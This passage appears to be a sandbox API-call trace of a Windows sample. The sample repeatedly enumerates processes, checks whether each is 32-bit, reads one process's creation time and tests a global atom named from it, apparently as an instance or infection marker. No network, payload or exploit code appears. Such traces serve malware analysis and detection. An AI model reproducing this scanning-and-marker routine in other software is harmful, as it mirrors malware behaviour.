	[0091.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.563] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.563] CloseHandle (hObject=0x20c) returned 1
	[0091.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.563] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.564] CloseHandle (hObject=0x20c) returned 1
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.636] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.636] CloseHandle (hObject=0x20c) returned 1
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.636] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.636] CloseHandle (hObject=0x20c) returned 1
	[0091.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.637] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.637] CloseHandle (hObject=0x20c) returned 1
	[0091.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.637] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.637] CloseHandle (hObject=0x20c) returned 1
	[0091.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.637] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.637] CloseHandle (hObject=0x20c) returned 1
	[0091.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.637] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.637] CloseHandle (hObject=0x20c) returned 1
	[0091.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.637] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.637] CloseHandle (hObject=0x20c) returned 1
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.638] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.638] CloseHandle (hObject=0x20c) returned 1
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.638] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.638] CloseHandle (hObject=0x20c) returned 1
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.638] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.638] CloseHandle (hObject=0x20c) returned 1
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.638] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.638] CloseHandle (hObject=0x20c) returned 1
	[0091.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.638] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.638] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.639] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.639] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.639] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.639] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.639] CloseHandle (hObject=0x20c) returned 1
	[0091.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.639] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.640] CloseHandle (hObject=0x20c) returned 1
	[0091.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.640] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.640] CloseHandle (hObject=0x20c) returned 1
	[0091.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.640] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.640] CloseHandle (hObject=0x20c) returned 1
	[0091.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.640] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.640] CloseHandle (hObject=0x20c) returned 1
	[0091.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.640] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.640] CloseHandle (hObject=0x20c) returned 1
	[0091.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.640] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.641] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.641] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.641] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.641] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.641] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.641] CloseHandle (hObject=0x20c) returned 1
	[0091.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.642] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.642] CloseHandle (hObject=0x20c) returned 1
	[0091.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.642] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.642] CloseHandle (hObject=0x20c) returned 1
	[0091.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.642] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.642] CloseHandle (hObject=0x20c) returned 1
	[0091.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.643] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.643] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.643] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.643] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.643] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.643] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.643] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.644] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.644] CloseHandle (hObject=0x20c) returned 1
	[0091.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.644] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.644] CloseHandle (hObject=0x20c) returned 1
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.720] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.720] CloseHandle (hObject=0x20c) returned 1
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.720] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.720] CloseHandle (hObject=0x20c) returned 1
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.720] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.720] CloseHandle (hObject=0x20c) returned 1
	[0091.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.721] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.721] CloseHandle (hObject=0x20c) returned 1
	[0091.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.721] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.721] CloseHandle (hObject=0x20c) returned 1
	[0091.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.721] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.721] CloseHandle (hObject=0x20c) returned 1
	[0091.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.721] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.721] CloseHandle (hObject=0x20c) returned 1
	[0091.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.721] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.721] CloseHandle (hObject=0x20c) returned 1
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.722] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.722] CloseHandle (hObject=0x20c) returned 1
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.722] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.722] CloseHandle (hObject=0x20c) returned 1
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.722] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.722] CloseHandle (hObject=0x20c) returned 1
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.722] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.722] CloseHandle (hObject=0x20c) returned 1
	[0091.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.722] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.723] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.723] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.723] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.723] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.723] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.723] CloseHandle (hObject=0x20c) returned 1
	[0091.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.724] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.724] CloseHandle (hObject=0x20c) returned 1
	[0091.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.724] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.724] CloseHandle (hObject=0x20c) returned 1
	[0091.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.724] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.724] CloseHandle (hObject=0x20c) returned 1
	[0091.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.724] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.724] CloseHandle (hObject=0x20c) returned 1
	[0091.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.724] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.724] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.725] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.725] CloseHandle (hObject=0x20c) returned 1
	[0091.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.726] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.726] CloseHandle (hObject=0x20c) returned 1
	[0091.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.726] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.726] CloseHandle (hObject=0x20c) returned 1
	[0091.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.726] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.726] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.726] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.726] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.727] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.727] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.727] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.727] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.728] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.728] CloseHandle (hObject=0x20c) returned 1
	[0091.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.728] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.728] CloseHandle (hObject=0x20c) returned 1
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
